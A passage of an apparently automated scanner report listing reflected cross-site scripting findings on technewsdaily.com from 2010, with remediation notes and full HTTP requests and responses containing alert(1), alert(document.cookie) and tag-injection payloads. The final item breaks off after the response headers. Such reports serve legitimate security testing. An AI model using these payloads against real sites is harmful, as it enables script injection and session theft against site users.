1.184. http://www.technewsdaily.com/t-mobile-wants-to-make-3g-faster-than-4g-1833/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.technewsdaily.com
Path:
/t-mobile-wants-to-make-3g-faster-than-4g-1833/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9a9b7'-alert(1)-'c47869b8b17 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /t-mobile-wants-to-make-3g-faster-than-4g-1833/?9a9b7'-alert(1)-'c47869b8b17=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:52:07 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:52:07 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 61914
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <script type="text/javascript"> <!- ...[SNIP]... type="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/t-mobile-wants-to-make-3g-faster-than-4g-1833/?9a9b7'-alert(1)-'c47869b8b17=1",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f05b6'-alert(1)-'d0151755033 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /taking-an-in-depth-look-at-3-d-glasses-1139f05b6'-alert(1)-'d0151755033/ HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:58:05 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:58:06 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 40484
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... ript type="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/taking-an-in-depth-look-at-3-d-glasses-1139f05b6'-alert(1)-'d0151755033/",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
1.186. http://www.technewsdaily.com/taking-an-in-depth-look-at-3-d-glasses-1139/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.technewsdaily.com
Path:
/taking-an-in-depth-look-at-3-d-glasses-1139/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe2c3"><a>cde99cc177c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /taking-an-in-depth-look-at-3-d-glasses-1139/?fe2c3"><a>cde99cc177c=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:57:39 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:57:39 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 71944
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <script type="text/javascript"> <!- ...[SNIP]... <link rel="canonical" src="http://www.technewsdaily.com/taking-an-in-depth-look-at-3-d-glasses-1139/?fe2c3"><a>cde99cc177c=1/" /> ...[SNIP]...
1.187. http://www.technewsdaily.com/taking-an-in-depth-look-at-3-d-glasses-1139/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.technewsdaily.com
Path:
/taking-an-in-depth-look-at-3-d-glasses-1139/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 39c03'-alert(1)-'07c101d197d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /taking-an-in-depth-look-at-3-d-glasses-1139/?39c03'-alert(1)-'07c101d197d=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:57:54 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:57:54 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 71582
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <script type="text/javascript"> <!- ...[SNIP]... pt type="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/taking-an-in-depth-look-at-3-d-glasses-1139/?39c03'-alert(1)-'07c101d197d=1",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 79b02'-alert(1)-'8f08b78f4f5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /templates/technewsdaily/css/79b02'-alert(1)-'8f08b78f4f5 HTTP/1.1 Host: www.technewsdaily.com Proxy-Connection: keep-alive Referer: http://www.technewsdaily.com/how-to-secure-privacy-on-facebook-0596f1fd9'-alert(document.cookie)-'eed141cc16/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:50:49 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" X-Content-Encoded-By: Joomla! 1.5 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:50:50 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 40456
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... <script type="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/templates/technewsdaily/css/79b02'-alert(1)-'8f08b78f4f5",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cef7d'-alert(1)-'918c6662efd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /terms-and-conditionscef7d'-alert(1)-'918c6662efd/ HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:58:51 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:58:51 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 40438
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... <script type="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/terms-and-conditionscef7d'-alert(1)-'918c6662efd/",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
1.190. http://www.technewsdaily.com/terms-and-conditions/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.technewsdaily.com
Path:
/terms-and-conditions/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f67aa'-alert(1)-'17b9c20d2cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /terms-and-conditions/?f67aa'-alert(1)-'17b9c20d2cf=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:58:37 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:58:37 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 40448
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... <script type="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/terms-and-conditions/?f67aa'-alert(1)-'17b9c20d2cf=1",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ae4a5'-alert(1)-'983a97dd071 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /the-exciting-new-features-in-android-23-gingerbread-1758ae4a5'-alert(1)-'983a97dd071/ HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:56:27 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:56:27 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 40510
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... xt/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/the-exciting-new-features-in-android-23-gingerbread-1758ae4a5'-alert(1)-'983a97dd071/",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
1.192. http://www.technewsdaily.com/the-exciting-new-features-in-android-23-gingerbread-1758/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e2a78'-alert(1)-'7cbe985692f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /the-exciting-new-features-in-android-23-gingerbread-1758/?e2a78'-alert(1)-'7cbe985692f=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:56:16 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:56:16 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 63359
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <script type="text/javascript"> <!- ...[SNIP]... /javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/the-exciting-new-features-in-android-23-gingerbread-1758/?e2a78'-alert(1)-'7cbe985692f=1",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
1.193. http://www.technewsdaily.com/the-exciting-new-features-in-android-23-gingerbread-1758/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54673"><a>0e36f168dee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /the-exciting-new-features-in-android-23-gingerbread-1758/?54673"><a>0e36f168dee=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:56:00 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:56:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 63721
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <script type="text/javascript"> <!- ...[SNIP]... <link rel="canonical" src="http://www.technewsdaily.com/the-exciting-new-features-in-android-23-gingerbread-1758/?54673"><a>0e36f168dee=1/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5c3b6'-alert(1)-'ac2bc6113ea was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /top-games-get-electronic-makeover-18045c3b6'-alert(1)-'ac2bc6113ea/ HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:54:27 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:54:28 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 40474
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... <script type="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/top-games-get-electronic-makeover-18045c3b6'-alert(1)-'ac2bc6113ea/",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
1.195. http://www.technewsdaily.com/top-games-get-electronic-makeover-1804/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.technewsdaily.com
Path:
/top-games-get-electronic-makeover-1804/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ec9b"><a>ba2ef4a497 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /top-games-get-electronic-makeover-1804/?5ec9b"><a>ba2ef4a497=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:54:04 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:54:04 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 66227
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <script type="text/javascript"> <!- ...[SNIP]... <link rel="canonical" src="http://www.technewsdaily.com/top-games-get-electronic-makeover-1804/?5ec9b"><a>ba2ef4a497=1/" /> ...[SNIP]...
1.196. http://www.technewsdaily.com/top-games-get-electronic-makeover-1804/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.technewsdaily.com
Path:
/top-games-get-electronic-makeover-1804/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f1fb4'-alert(1)-'19a27fe47f0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /top-games-get-electronic-makeover-1804/?f1fb4'-alert(1)-'19a27fe47f0=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:54:17 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:54:17 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 65895
